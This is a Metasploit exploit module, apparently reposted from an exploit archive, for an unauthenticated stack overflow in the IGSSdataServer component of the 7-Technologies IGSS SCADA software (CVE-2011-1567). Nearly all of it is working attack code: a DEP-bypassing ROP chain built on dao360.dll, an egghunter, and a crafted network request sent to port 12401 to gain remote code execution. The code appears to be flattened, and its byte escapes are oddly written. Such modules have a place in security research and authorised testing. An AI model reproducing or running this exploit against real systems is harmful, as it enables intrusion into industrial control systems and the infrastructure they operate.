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# Title : 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow
# Published : 2011-05-16
# Author : metasploit
# Previous Title : XtreamerPRO Media-player Multiple Vulnerabilities
# Next Title : Cisco Unified Operations Manager Multiple Vulnerabilities

### $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote	Rank = GoodRanking	include Msf::Exploit::Remote::Egghunter	include Msf::Exploit::Remote::Tcp	def initialize(info={})		super(update_info(info,			'Name'           => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",			'Description'    => %q{					This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies				IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application				fails to do proper bounds checking before copying data into a small buffer on the stack.				This causes a buffer overflow and allows to overwrite a structured exception handling record				on the stack, allowing for unauthenticated remote code execution.			},			'License'        => MSF_LICENSE,			'Version'        => '$Revision: 12639 $',			'Author'         =>				[					'Luigi Auriemma', #Initial discovery, poc					'Lincoln',        #Metasploit					'corelanc0d3r',   #Rop exploit, combined XP SP3 & 2003 Server					'sinn3r',         #Serious Msf style policing				],			'References'     =>				[					['CVE', '2011-1567'],					['OSVDB', ''],					['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],				],			'Payload'        =>				{					'BadChars' => "/x00",				},			'DefaultOptions'  =>				{					'ExitFunction' => 'process',				},			'Platform'       => 'win',			'Targets'        =>				[					[						'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',						{							'Ret'    => 0x1b77ca8c,  #dao360.dll pivot 1388 bytes							'Offset' => 500						}					],				],			'Privileged'     => false,			'DisclosureDate' => "March 24 2011",			'DefaultTarget'  => 0))			register_options(			[				Opt::RPORT(12401)			], self.class)	end	def junk		return rand_text(4).unpack("L")[0].to_i	end	def exploit		eggoptions =		{			:checksum => false,			:eggtag => 'w00t',			:depmethod => 'virtualprotect',			:depreg => 'esi'		}		badchars = "/x00"		hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)		#dao360.dll - pvefindaddr rop 'n roll		rop_chain = [			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b7681c4,  # rop nop			0x1b72f174,  # POP EAX # RETN 08			0xA1A10101,			0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08 			junk,			junk,			0x1b73a55c,  # XCHG EAX,EBX # RETN			junk,			junk,			0x1b724004,  # pop ebp			0x1b72f15f,  # &push esp # retn 8			0x1b72f040,  # POP ECX # RETN			0x1B78F010,  # writeable			0x1b7681c2,  # xor eax,eax # retn			0x1b72495c,  # add al,40 # mov [esi+4],eax # pop esi # retn 4			0x41414141,  			0x1b76a883,  # XCHG EAX,ESI # RETN 00  			junk,			0x1b7785c1,  # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C 			junk,			junk,			0x1b78535c,  # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10			junk,			junk,			junk,			junk,			0x1b7280b4,  # POP EDI # XOR EAX,EAX # POP ESI # RETN			junk,			junk,			junk,			junk,			0x1b7681c4,  # rop nop (edi)			0x90909090,  # esi -> eax -> nop			0x1b72f174,  # POP EAX # RETN 08			0xA1F50214,  # offset to &VirtualProtect			0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08			junk,			junk,			0x1b73f3bd,  # MOV EAX,DWORD PTR DS:[EAX] # RETN			junk,			junk,			0x1b76a883,  # XCHG EAX,ESI # RETN 00			0x1b72f040,  # pop ecx			0x1B78F010,  # writeable (ecx)			0x1b764716,  # PUSHAD # RETN		].pack('V*')		header = "/x00/x04/x01/x00/x34/x12/x0D/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x00/x00"		header << rand_text(14)		sploit = rop_chain		sploit << "/x90" * 10		sploit << hunter		sploit << rand_text(target['Offset'] - (sploit.length))		sploit << [target.ret].pack('V') 		sploit << egg		sploit << rand_text(2000)		connect		print_status("Sending request...")		sock.put(header + sploit)		handler		disconnect	endend